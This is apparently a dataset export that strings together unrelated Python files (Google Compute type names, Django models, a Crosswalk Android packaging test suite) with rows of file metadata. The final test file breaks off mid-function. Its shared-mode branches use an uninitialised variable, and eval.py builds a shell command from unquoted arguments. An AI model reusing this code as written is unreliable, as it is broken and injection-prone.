"TestIamPermissionsRegionDiskRequest",
"TestIamPermissionsReservationRequest",
"TestIamPermissionsResourcePolicyRequest",
"TestIamPermissionsServiceAttachmentRequest",
"TestIamPermissionsSnapshotRequest",
"TestIamPermissionsSubnetworkRequest",
"TestIamPermissionsVpnGatewayRequest",
"TestPermissionsRequest",
"TestPermissionsResponse",
"Uint128",
"UpdateAccessConfigInstanceRequest",
"UpdateAutoscalerRequest",
"UpdateBackendBucketRequest",
"UpdateBackendServiceRequest",
"UpdateDisplayDeviceInstanceRequest",
"UpdateFirewallRequest",
"UpdateHealthCheckRequest",
"UpdateInstanceRequest",
"UpdateNetworkInterfaceInstanceRequest",
"UpdatePeeringNetworkRequest",
"UpdatePerInstanceConfigsInstanceGroupManagerRequest",
"UpdatePerInstanceConfigsRegionInstanceGroupManagerRequest",
"UpdateRegionAutoscalerRequest",
"UpdateRegionBackendServiceRequest",
"UpdateRegionHealthCheckRequest",
"UpdateRegionUrlMapRequest",
"UpdateRouterRequest",
"UpdateShieldedInstanceConfigInstanceRequest",
"UpdateUrlMapRequest",
"UrlMap",
"UrlMapList",
"UrlMapReference",
"UrlMapsAggregatedList",
"UrlMapsScopedList",
"UrlMapsValidateRequest",
"UrlMapsValidateResponse",
"UrlMapTest",
"UrlMapTestHeader",
"UrlMapValidationResult",
"UrlRewrite",
"UsableSubnetwork",
"UsableSubnetworksAggregatedList",
"UsableSubnetworkSecondaryRange",
"UsageExportLocation",
"ValidateRegionUrlMapRequest",
"ValidateUrlMapRequest",
"VmEndpointNatMappings",
"VmEndpointNatMappingsInterfaceNatMappings",
"VmEndpointNatMappingsList",
"VpnGateway",
"VpnGatewayAggregatedList",
"VpnGatewayList",
"VpnGatewaysGetStatusResponse",
"VpnGatewaysScopedList",
"VpnGatewayStatus",
"VpnGatewayStatusHighAvailabilityRequirementState",
"VpnGatewayStatusTunnel",
"VpnGatewayStatusVpnConnection",
"VpnGatewayVpnGatewayInterface",
"VpnTunnel",
"VpnTunnelAggregatedList",
"VpnTunnelList",
"VpnTunnelsScopedList",
"WafExpressionSet",
"WafExpressionSetExpression",
"WaitGlobalOperationRequest",
"WaitRegionOperationRequest",
"WaitZoneOperationRequest",
"Warning",
"Warnings",
"WeightedBackendService",
"XpnHostList",
"XpnResourceId",
"Zone",
"ZoneList",
"ZoneSetLabelsRequest",
"ZoneSetPolicyRequest",
)
| 33.916275
| 77
| 0.793345
| 2,417
| 79,398
| 26.059578
| 0.508482
| 0.000953
| 0.000413
| 0.000508
| 0.99257
| 0.99257
| 0.99257
| 0.99257
| 0.99257
| 0.99257
| 0
| 0.000369
| 0.147548
| 79,398
| 2,340
| 78
| 33.930769
| 0.930234
| 0.007166
| 0
| 0
| 0
| 0
| 0.396622
| 0.337178
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.001721
| 0.00043
| 0
| 0.00043
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a83c90482ee8f3e2377f618733f12f1aa51ea1e1
| 75
|
py
|
Python
|
spartan/model/specgreedy/__init__.py
|
xyyphant0m/spartan2
|
6c40247052cdce80c2787c9ee0c5485e218c082d
|
[
"BSD-3-Clause"
] | 50
|
2020-08-24T15:21:37.000Z
|
2022-03-09T09:18:17.000Z
|
spartan/model/specgreedy/__init__.py
|
xyyphant0m/spartan2
|
6c40247052cdce80c2787c9ee0c5485e218c082d
|
[
"BSD-3-Clause"
] | 16
|
2020-08-24T15:20:46.000Z
|
2021-12-20T03:13:40.000Z
|
spartan/model/specgreedy/__init__.py
|
xyyphant0m/spartan2
|
6c40247052cdce80c2787c9ee0c5485e218c082d
|
[
"BSD-3-Clause"
] | 15
|
2020-08-24T15:13:16.000Z
|
2022-02-26T15:25:05.000Z
|
from .Specgreedy import Specgreedy
def __call__():
return Specgreedy
| 12.5
| 34
| 0.76
| 8
| 75
| 6.625
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.186667
| 75
| 5
| 35
| 15
| 0.868852
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
a87c000e1617ea8bb248ef0e27a4380a107775af
| 162
|
py
|
Python
|
tapis_cli/commands/taccapis/model/v2/__init__.py
|
bpachev/tapis-cli
|
c3128fb5b63ef74e06b737bbd95ef28fb24f0d32
|
[
"BSD-3-Clause"
] | 8
|
2020-10-18T22:48:23.000Z
|
2022-01-10T09:16:14.000Z
|
tapis_cli/commands/taccapis/model/v2/__init__.py
|
bpachev/tapis-cli
|
c3128fb5b63ef74e06b737bbd95ef28fb24f0d32
|
[
"BSD-3-Clause"
] | 238
|
2019-09-04T14:37:54.000Z
|
2020-04-15T16:24:24.000Z
|
tapis_cli/commands/taccapis/model/v2/__init__.py
|
bpachev/tapis-cli
|
c3128fb5b63ef74e06b737bbd95ef28fb24f0d32
|
[
"BSD-3-Clause"
] | 5
|
2019-09-20T04:23:49.000Z
|
2020-01-16T17:45:14.000Z
|
from .tapismodel import TapisModel
from .permission import Permission
from .permission import AbacoPermission
from .message import Message
from .role import Role
| 27
| 39
| 0.845679
| 20
| 162
| 6.85
| 0.35
| 0.20438
| 0.291971
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123457
| 162
| 5
| 40
| 32.4
| 0.964789
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
76810eecf20c01caa10ec0f4caa246bfa2bb6b9b
| 261
|
py
|
Python
|
eval.py
|
guitaowufeng/Cross-Domain-CWS
|
9cb26fbb867684c2ffaf70308b74e8986da22d5a
|
[
"MIT"
] | 14
|
2018-08-10T06:43:59.000Z
|
2022-01-09T04:13:40.000Z
|
eval.py
|
guitaowufeng/Cross-Domain-CWS
|
9cb26fbb867684c2ffaf70308b74e8986da22d5a
|
[
"MIT"
] | 1
|
2019-04-02T04:45:31.000Z
|
2019-04-19T14:49:23.000Z
|
eval.py
|
egrcc/Cross-Domain-CWS
|
9cb26fbb867684c2ffaf70308b74e8986da22d5a
|
[
"MIT"
] | 2
|
2018-08-10T06:44:12.000Z
|
2019-01-04T13:13:47.000Z
|
import os
import sys
os.system("perl ./evaluation/score_4 ./evaluation/gold/%s_dict.txt ./evaluation/gold/%s_test.txt ./output/%s_test_%s.txt > ./output/%s_%s_score.txt"\
% (sys.argv[1], sys.argv[2], sys.argv[2], sys.argv[3], sys.argv[2], sys.argv[3]))
| 52.2
| 150
| 0.670498
| 48
| 261
| 3.5
| 0.375
| 0.25
| 0.142857
| 0.196429
| 0.238095
| 0.190476
| 0
| 0
| 0
| 0
| 0
| 0.029787
| 0.099617
| 261
| 5
| 151
| 52.2
| 0.685106
| 0
| 0
| 0
| 0
| 0.25
| 0.527132
| 0.406977
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
768b43d91d34db44ab9917b57115db4c36ae85d9
| 1,513
|
py
|
Python
|
main/models.py
|
AmanatM/neon-studio
|
2778ac44cef88e6a9fbdd2eae46b0a028a6d57ca
|
[
"MIT"
] | null | null | null |
main/models.py
|
AmanatM/neon-studio
|
2778ac44cef88e6a9fbdd2eae46b0a028a6d57ca
|
[
"MIT"
] | null | null | null |
main/models.py
|
AmanatM/neon-studio
|
2778ac44cef88e6a9fbdd2eae46b0a028a6d57ca
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class Content(models.Model):
title = models.CharField(max_length=50, default='')
features_heading = models.CharField(max_length=50, default='Почему мы?')
feature_1_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?')
feature_2_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?')
feature_3_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?')
feature_4_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?')
feature_5_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?')
feature_6_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?')
feature_7_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?')
feature_8_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?')
feature_9_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?')
def __str__(self):
return self.title
| 56.037037
| 138
| 0.793787
| 207
| 1,513
| 5.637681
| 0.227053
| 0.141388
| 0.169666
| 0.226221
| 0.883462
| 0.883462
| 0.826907
| 0.826907
| 0.826907
| 0.826907
| 0
| 0.029674
| 0.109055
| 1,513
| 26
| 139
| 58.192308
| 0.836053
| 0.015863
| 0
| 0
| 0
| 0
| 0.46734
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.066667
| 0.066667
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
4f94efc4ec726d2ce90a2dc3fb86c599b5b4bc3e
| 185
|
py
|
Python
|
delta_node/entity/__init__.py
|
delta-mpc/delta-node
|
674fc61f951e41ed353597f93ca6ea6bc74a102b
|
[
"Apache-2.0"
] | 4
|
2021-07-22T01:11:15.000Z
|
2022-03-17T03:26:20.000Z
|
delta_node/entity/__init__.py
|
delta-mpc/delta-node
|
674fc61f951e41ed353597f93ca6ea6bc74a102b
|
[
"Apache-2.0"
] | 10
|
2021-09-13T09:55:02.000Z
|
2022-03-23T09:41:26.000Z
|
delta_node/entity/__init__.py
|
delta-mpc/delta-node
|
674fc61f951e41ed353597f93ca6ea6bc74a102b
|
[
"Apache-2.0"
] | null | null | null |
from .base import *
from .event import *
from .node import *
from .task import *
from .task_round import *
from .round_member import *
from .secret_share import *
from .record import *
| 20.555556
| 27
| 0.740541
| 27
| 185
| 4.962963
| 0.407407
| 0.522388
| 0.208955
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.172973
| 185
| 8
| 28
| 23.125
| 0.875817
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4fa090bf49541752fb19fe57f6922f5295ddfc43
| 25,638
|
py
|
Python
|
apptools/apptools-android-tests/apptools/crosswalk_app_targets.py
|
jennycao/crosswalk-test-suite
|
64874a2941276681cc9823c11dfc024cfe7aac47
|
[
"BSD-3-Clause"
] | null | null | null |
apptools/apptools-android-tests/apptools/crosswalk_app_targets.py
|
jennycao/crosswalk-test-suite
|
64874a2941276681cc9823c11dfc024cfe7aac47
|
[
"BSD-3-Clause"
] | null | null | null |
apptools/apptools-android-tests/apptools/crosswalk_app_targets.py
|
jennycao/crosswalk-test-suite
|
64874a2941276681cc9823c11dfc024cfe7aac47
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright (c) 2016 Intel Corporation.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of works must retain the original copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the original copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Intel Corporation nor the names of its contributors
# may be used to endorse or promote products derived from this work without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors:
# Yun, Liu<yunx.liu@intel.com>
import unittest
import os
import comm
import shutil
class TestCrosswalkApptoolsFunctions(unittest.TestCase):
def test_create_arm32(self):
comm.setUp()
os.chdir(comm.XwalkPath)
comm.clear("org.xwalk.test")
cmd = comm.HOST_PREFIX + comm.PackTools + \
"crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=armeabi-v7a"
(return_create_code, output) = comm.getstatusoutput(cmd)
crosswalkVersion = comm.check_crosswalk_version(self, "canary")
self.assertEquals(return_create_code, 0)
self.assertIn('crosswalk-{}.zip'.format(crosswalkVersion), output[0])
self.assertNotIn('crosswalk-{}-64bit.zip'.format(crosswalkVersion), output[0])
os.chdir(comm.XwalkPath + 'org.xwalk.test')
buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build"
return_code = os.system(buildcmd)
apks = os.listdir(os.getcwd())
x86Length = 0
x86_64Length = 0
armLength = 0
arm_64Length = 0
if comm.MODE != " --android-shared":
for i in range(len(apks)):
if apks[i].endswith(".apk") and "x86" in apks[i]:
if "64" in apks[i]:
x86_64Length = x86_64Length + 1
else:
x86Length = x86Length + 1
if apks[i].endswith(".apk") and "arm" in apks[i]:
if "64" in apks[i]:
arm_64Length = arm_64Length + 1
else:
armLength = armLength + 1
self.assertEquals(x86_64Length, 0)
self.assertEquals(arm_64Length, 0)
self.assertEquals(x86Length, 1)
self.assertEquals(armLength, 1)
else:
for i in range(len(apks)):
if apks[i].endswith(".apk") and "shared" in apks[i]:
apkLength = apkLength + 1
self.assertEquals(apkLength, 1)
comm.clear("org.xwalk.test")
self.assertEquals(return_code, 0)
def test_create_x8632(self):
comm.setUp()
os.chdir(comm.XwalkPath)
comm.clear("org.xwalk.test")
cmd = comm.HOST_PREFIX + comm.PackTools + \
"crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=x86"
(return_create_code, output) = comm.getstatusoutput(cmd)
crosswalkVersion = comm.check_crosswalk_version(self, "canary")
self.assertEquals(return_create_code, 0)
self.assertIn('crosswalk-{}.zip'.format(crosswalkVersion), output[0])
self.assertNotIn('crosswalk-{}-64bit.zip'.format(crosswalkVersion), output[0])
os.chdir(comm.XwalkPath + 'org.xwalk.test')
buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build"
return_code = os.system(buildcmd)
apks = os.listdir(os.getcwd())
x86Length = 0
x86_64Length = 0
armLength = 0
arm_64Length = 0
if comm.MODE != " --android-shared":
for i in range(len(apks)):
if apks[i].endswith(".apk") and "x86" in apks[i]:
if "64" in apks[i]:
x86_64Length = x86_64Length + 1
else:
x86Length = x86Length + 1
if apks[i].endswith(".apk") and "arm" in apks[i]:
if "64" in apks[i]:
arm_64Length = arm_64Length + 1
else:
armLength = armLength + 1
self.assertEquals(x86_64Length, 0)
self.assertEquals(arm_64Length, 0)
self.assertEquals(x86Length, 1)
self.assertEquals(armLength, 1)
else:
for i in range(len(apks)):
if apks[i].endswith(".apk") and "shared" in apks[i]:
apkLength = apkLength + 1
self.assertEquals(apkLength, 1)
comm.clear("org.xwalk.test")
self.assertEquals(return_code, 0)
def test_create_arm64(self):
comm.setUp()
os.chdir(comm.XwalkPath)
comm.clear("org.xwalk.test")
cmd = comm.HOST_PREFIX + comm.PackTools + \
"crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=arm64-v8a"
(return_create_code, output) = comm.getstatusoutput(cmd)
crosswalkVersion = comm.check_crosswalk_version(self, "canary")
self.assertEquals(return_create_code, 0)
self.assertNotIn('crosswalk-{}.zip'.format(crosswalkVersion), output[0])
self.assertIn('crosswalk-{}-64bit.zip'.format(crosswalkVersion), output[0])
os.chdir(comm.XwalkPath + 'org.xwalk.test')
buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build"
return_code = os.system(buildcmd)
apks = os.listdir(os.getcwd())
x86Length = 0
x86_64Length = 0
armLength = 0
arm_64Length = 0
if comm.MODE != " --android-shared":
for i in range(len(apks)):
if apks[i].endswith(".apk") and "x86" in apks[i]:
if "64" in apks[i]:
x86_64Length = x86_64Length + 1
else:
x86Length = x86Length + 1
if apks[i].endswith(".apk") and "arm" in apks[i]:
if "64" in apks[i]:
arm_64Length = arm_64Length + 1
else:
armLength = armLength + 1
self.assertEquals(x86_64Length, 1)
self.assertEquals(arm_64Length, 1)
self.assertEquals(x86Length, 0)
self.assertEquals(armLength, 0)
else:
for i in range(len(apks)):
if apks[i].endswith(".apk") and "shared" in apks[i]:
apkLength = apkLength + 1
self.assertEquals(apkLength, 1)
comm.clear("org.xwalk.test")
self.assertEquals(return_code, 0)
def test_create_x8664(self):
comm.setUp()
os.chdir(comm.XwalkPath)
comm.clear("org.xwalk.test")
cmd = comm.HOST_PREFIX + comm.PackTools + \
"crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=x86_64"
(return_create_code, output) = comm.getstatusoutput(cmd)
crosswalkVersion = comm.check_crosswalk_version(self, "canary")
self.assertEquals(return_create_code, 0)
self.assertNotIn('crosswalk-{}.zip'.format(crosswalkVersion), output[0])
self.assertIn('crosswalk-{}-64bit.zip'.format(crosswalkVersion), output[0])
os.chdir(comm.XwalkPath + 'org.xwalk.test')
buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build"
return_code = os.system(buildcmd)
apks = os.listdir(os.getcwd())
x86Length = 0
x86_64Length = 0
armLength = 0
arm_64Length = 0
if comm.MODE != " --android-shared":
for i in range(len(apks)):
if apks[i].endswith(".apk") and "x86" in apks[i]:
if "64" in apks[i]:
x86_64Length = x86_64Length + 1
else:
x86Length = x86Length + 1
if apks[i].endswith(".apk") and "arm" in apks[i]:
if "64" in apks[i]:
arm_64Length = arm_64Length + 1
else:
armLength = armLength + 1
self.assertEquals(x86_64Length, 1)
self.assertEquals(arm_64Length, 1)
self.assertEquals(x86Length, 0)
self.assertEquals(armLength, 0)
else:
for i in range(len(apks)):
if apks[i].endswith(".apk") and "shared" in apks[i]:
apkLength = apkLength + 1
self.assertEquals(apkLength, 1)
comm.clear("org.xwalk.test")
self.assertEquals(return_code, 0)
def test_create_arm64_x8664(self):
comm.setUp()
os.chdir(comm.XwalkPath)
comm.clear("org.xwalk.test")
cmd = comm.HOST_PREFIX + comm.PackTools + \
"crosswalk-app create org.xwalk.test" + comm.MODE + ' --android-crosswalk=canary --android-targets="arm64-v8a x86_64"'
(return_create_code, output) = comm.getstatusoutput(cmd)
crosswalkVersion = comm.check_crosswalk_version(self, "canary")
self.assertEquals(return_create_code, 0)
self.assertNotIn('crosswalk-{}.zip'.format(crosswalkVersion), output[0])
self.assertIn('crosswalk-{}-64bit.zip'.format(crosswalkVersion), output[0])
os.chdir(comm.XwalkPath + 'org.xwalk.test')
buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build"
return_code = os.system(buildcmd)
apks = os.listdir(os.getcwd())
x86Length = 0
x86_64Length = 0
armLength = 0
arm_64Length = 0
if comm.MODE != " --android-shared":
for i in range(len(apks)):
if apks[i].endswith(".apk") and "x86" in apks[i]:
if "64" in apks[i]:
x86_64Length = x86_64Length + 1
else:
x86Length = x86Length + 1
if apks[i].endswith(".apk") and "arm" in apks[i]:
if "64" in apks[i]:
arm_64Length = arm_64Length + 1
else:
armLength = armLength + 1
self.assertEquals(x86_64Length, 1)
self.assertEquals(arm_64Length, 1)
self.assertEquals(x86Length, 0)
self.assertEquals(armLength, 0)
else:
for i in range(len(apks)):
if apks[i].endswith(".apk") and "shared" in apks[i]:
apkLength = apkLength + 1
self.assertEquals(apkLength, 1)
comm.clear("org.xwalk.test")
self.assertEquals(return_code, 0)
def test_create_arm32_x8664(self):
comm.setUp()
os.chdir(comm.XwalkPath)
comm.clear("org.xwalk.test")
cmd = comm.HOST_PREFIX + comm.PackTools + \
"crosswalk-app create org.xwalk.test" + comm.MODE + ' --android-crosswalk=canary --android-targets="armeabi-v7a x86_64"'
return_code = os.system(cmd)
comm.clear("org.xwalk.test")
self.assertNotEquals(return_code, 0)
def test_build_arm32(self):
comm.setUp()
os.chdir(comm.XwalkPath)
comm.clear("org.xwalk.test")
cmd = comm.HOST_PREFIX + comm.PackTools + \
"crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=armeabi-v7a"
os.system(cmd)
os.chdir(comm.XwalkPath + 'org.xwalk.test')
buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build --android-targets=armeabi-v7a ./"
return_code = os.system(buildcmd)
apks = os.listdir(os.getcwd())
x86Length = 0
x86_64Length = 0
armLength = 0
arm_64Length = 0
if comm.MODE != " --android-shared":
for i in range(len(apks)):
if apks[i].endswith(".apk") and "x86" in apks[i]:
if "64" in apks[i]:
x86_64Length = x86_64Length + 1
else:
x86Length = x86Length + 1
if apks[i].endswith(".apk") and "arm" in apks[i]:
if "64" in apks[i]:
arm_64Length = arm_64Length + 1
else:
armLength = armLength + 1
self.assertEquals(x86_64Length, 0)
self.assertEquals(arm_64Length, 0)
self.assertEquals(x86Length, 0)
self.assertEquals(armLength, 1)
else:
for i in range(len(apks)):
if apks[i].endswith(".apk") and "shared" in apks[i]:
apkLength = apkLength + 1
self.assertEquals(apkLength, 1)
comm.clear("org.xwalk.test")
self.assertEquals(return_code, 0)
def test_build_x8632(self):
comm.setUp()
os.chdir(comm.XwalkPath)
comm.clear("org.xwalk.test")
cmd = comm.HOST_PREFIX + comm.PackTools + \
"crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=armeabi-v7a"
os.system(cmd)
os.chdir(comm.XwalkPath + 'org.xwalk.test')
buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build --android-targets=x86 ./"
return_code = os.system(buildcmd)
apks = os.listdir(os.getcwd())
x86Length = 0
x86_64Length = 0
armLength = 0
arm_64Length = 0
if comm.MODE != " --android-shared":
for i in range(len(apks)):
if apks[i].endswith(".apk") and "x86" in apks[i]:
if "64" in apks[i]:
x86_64Length = x86_64Length + 1
else:
x86Length = x86Length + 1
if apks[i].endswith(".apk") and "arm" in apks[i]:
if "64" in apks[i]:
arm_64Length = arm_64Length + 1
else:
armLength = armLength + 1
self.assertEquals(x86_64Length, 0)
self.assertEquals(arm_64Length, 0)
self.assertEquals(x86Length, 1)
self.assertEquals(armLength, 0)
else:
for i in range(len(apks)):
if apks[i].endswith(".apk") and "shared" in apks[i]:
apkLength = apkLength + 1
self.assertEquals(apkLength, 1)
comm.clear("org.xwalk.test")
self.assertEquals(return_code, 0)
def test_build_arm32_x8632(self):
comm.setUp()
os.chdir(comm.XwalkPath)
comm.clear("org.xwalk.test")
cmd = comm.HOST_PREFIX + comm.PackTools + \
"crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=armeabi-v7a"
os.system(cmd)
os.chdir(comm.XwalkPath + 'org.xwalk.test')
buildcmd = comm.HOST_PREFIX + comm.PackTools + 'crosswalk-app build --android-targets="armeabi-v7a x86" ./'
return_code = os.system(buildcmd)
apks = os.listdir(os.getcwd())
x86Length = 0
x86_64Length = 0
armLength = 0
arm_64Length = 0
if comm.MODE != " --android-shared":
for i in range(len(apks)):
if apks[i].endswith(".apk") and "x86" in apks[i]:
if "64" in apks[i]:
x86_64Length = x86_64Length + 1
else:
x86Length = x86Length + 1
if apks[i].endswith(".apk") and "arm" in apks[i]:
if "64" in apks[i]:
arm_64Length = arm_64Length + 1
else:
armLength = armLength + 1
self.assertEquals(x86_64Length, 0)
self.assertEquals(arm_64Length, 0)
self.assertEquals(x86Length, 1)
self.assertEquals(armLength, 1)
else:
for i in range(len(apks)):
if apks[i].endswith(".apk") and "shared" in apks[i]:
apkLength = apkLength + 1
self.assertEquals(apkLength, 1)
comm.clear("org.xwalk.test")
self.assertEquals(return_code, 0)
def test_build_arm32_x8664(self):
comm.setUp()
os.chdir(comm.XwalkPath)
comm.clear("org.xwalk.test")
cmd = comm.HOST_PREFIX + comm.PackTools + \
"crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=armeabi-v7a"
os.system(cmd)
os.chdir(comm.XwalkPath + 'org.xwalk.test')
buildcmd = comm.HOST_PREFIX + comm.PackTools + 'crosswalk-app build --android-targets="armeabi-v7a x86_64" ./'
return_code = os.system(buildcmd)
apks = os.listdir(os.getcwd())
x86Length = 0
x86_64Length = 0
armLength = 0
arm_64Length = 0
if comm.MODE != " --android-shared":
for i in range(len(apks)):
if apks[i].endswith(".apk") and "x86" in apks[i]:
if "64" in apks[i]:
x86_64Length = x86_64Length + 1
else:
x86Length = x86Length + 1
if apks[i].endswith(".apk") and "arm" in apks[i]:
if "64" in apks[i]:
arm_64Length = arm_64Length + 1
else:
armLength = armLength + 1
self.assertEquals(x86_64Length, 0)
self.assertEquals(arm_64Length, 0)
self.assertEquals(x86Length, 0)
self.assertEquals(armLength, 1)
else:
for i in range(len(apks)):
if apks[i].endswith(".apk") and "shared" in apks[i]:
apkLength = apkLength + 1
self.assertEquals(apkLength, 1)
comm.clear("org.xwalk.test")
self.assertEquals(return_code, 0)
def test_build_arm64(self):
comm.setUp()
os.chdir(comm.XwalkPath)
comm.clear("org.xwalk.test")
cmd = comm.HOST_PREFIX + comm.PackTools + \
"crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=x86_64"
os.system(cmd)
os.chdir(comm.XwalkPath + 'org.xwalk.test')
buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build --android-targets=arm64-v8a ./"
return_code = os.system(buildcmd)
apks = os.listdir(os.getcwd())
x86Length = 0
x86_64Length = 0
armLength = 0
arm_64Length = 0
if comm.MODE != " --android-shared":
for i in range(len(apks)):
if apks[i].endswith(".apk") and "x86" in apks[i]:
if "64" in apks[i]:
x86_64Length = x86_64Length + 1
else:
x86Length = x86Length + 1
if apks[i].endswith(".apk") and "arm" in apks[i]:
if "64" in apks[i]:
arm_64Length = arm_64Length + 1
else:
armLength = armLength + 1
self.assertEquals(x86_64Length, 0)
self.assertEquals(arm_64Length, 1)
self.assertEquals(x86Length, 0)
self.assertEquals(armLength, 0)
else:
for i in range(len(apks)):
if apks[i].endswith(".apk") and "shared" in apks[i]:
apkLength = apkLength + 1
self.assertEquals(apkLength, 1)
comm.clear("org.xwalk.test")
self.assertEquals(return_code, 0)
def test_build_x8664(self):
comm.setUp()
os.chdir(comm.XwalkPath)
comm.clear("org.xwalk.test")
cmd = comm.HOST_PREFIX + comm.PackTools + \
"crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=x86_64"
os.system(cmd)
os.chdir(comm.XwalkPath + 'org.xwalk.test')
buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build --android-targets=x86_64 ./"
return_code = os.system(buildcmd)
apks = os.listdir(os.getcwd())
x86Length = 0
x86_64Length = 0
armLength = 0
arm_64Length = 0
if comm.MODE != " --android-shared":
for i in range(len(apks)):
if apks[i].endswith(".apk") and "x86" in apks[i]:
if "64" in apks[i]:
